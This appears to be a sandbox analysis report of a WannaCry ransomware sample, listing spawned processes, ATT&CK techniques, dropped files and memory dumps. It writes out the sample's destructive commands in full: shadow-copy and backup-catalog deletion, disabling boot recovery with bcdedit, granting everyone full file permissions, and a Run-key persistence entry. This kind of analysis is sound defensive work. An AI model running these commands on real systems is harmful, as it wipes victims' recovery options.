Token: SeUndockPrivilege	496	WMIC.exe
Token: SeManageVolumePrivilege	496	WMIC.exe
Token: 33	496	WMIC.exe
Token: 34	496	WMIC.exe
Token: 35	496	WMIC.exe
Token: 36	496	WMIC.exe
Token: SeTcbPrivilege	1468	taskse.exe
Token: SeTcbPrivilege	5068	taskse.exe
Token: SeTcbPrivilege	3724	taskse.exe

Deletes shadow copies 2 TTPs 2 IoCs
ransomware

Inhibit System Recovery
T1490

Processes:

vssadmin.exeWMIC.exe

pid process

660 vssadmin.exe
496 WMIC.exe
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Processes:

attrib.exe

pid process

4972 attrib.exe
Loads dropped DLL 1 IoCs

Processes:

taskhsvc.exe

pid process

4896 taskhsvc.exe

pid	process
660	vssadmin.exe
496	WMIC.exe

pid	process
4972	attrib.exe

pid	process
4896	taskhsvc.exe

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	pid	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	4264	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	4264	svchost.exe

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Wannacry file encrypt
- Drops Office document
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\SysWOW64\attrib.exe
attrib +h .
1⤵
- Views/modifies file attributes
PID:4972

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
1⤵
- Modifies file permissions
PID:4996

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
1⤵
- Executes dropped EXE
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 67911571421170.bat
1⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
1⤵
PID:2820

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] co
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
1⤵
- Suspicious use of WriteProcessMemory
PID:3752

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] vs
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2976

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:4284

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
1⤵
- Suspicious use of WriteProcessMemory
PID:4236

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
1⤵
- Executes dropped EXE
PID:4128

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
1⤵
- Adds Run entry to start application
- Modifies registry key
PID:4184

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Loads dropped DLL
PID:4896

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
1⤵
- Suspicious use of WriteProcessMemory
PID:4292

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
1⤵
- Deletes shadow copies
PID:660

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
1⤵
- Suspicious use of AdjustPrivilegeToken
- Deletes shadow copies
PID:496

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
1⤵
- Executes dropped EXE
PID:1340

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:1508

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies service
- Drops file in system dir
PID:1984

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
1⤵
- Executes dropped EXE
PID:5028

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:5088

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
- Checks system information in the registry (likely anti-VM)
PID:4264

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:4192

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
- Windows security modification
PID:2812

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4540

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
1⤵
- Executes dropped EXE
PID:4328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

MITRE ATT&CK Additional techniques

T1031
T1089
T1060
T1107
T1158

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\10.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\12.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\13.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\14.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\15.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\16.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\17.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\18.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\19.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\20.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\21.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\22.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\23.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\24.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\25.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\26.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\27.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\28.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\5.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\67911571421170.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\8.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\9.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\b.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.vbs

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\r.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\t.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\u.wnry

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\ssleay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

Download Submit
memory/4896-230-0x0000000003AA0000-0x0000000003AA1000-memory.dmp

Filesize
4KB

Download
memory/4896-231-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-67-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-146-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-229-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-65-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-447-0x0000000003880000-0x0000000003881000-memory.dmp

Filesize
4KB

Download
memory/4896-66-0x0000000003AA0000-0x0000000003AA1000-memory.dmp

Filesize
4KB

Download
memory/4896-233-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-308-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-312-0x00000000032A0000-0x00000000032A1000-memory.dmp

Filesize
4KB

Download
memory/4896-394-0x0000000004080000-0x0000000004081000-memory.dmp

Filesize
4KB

Download
memory/4896-393-0x0000000003880000-0x0000000003881000-memory.dmp

Filesize
4KB

Download
memory/4896-395-0x0000000003880000-0x0000000003881000-memory.dmp

Filesize
4KB

Download
memory/4956-36-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download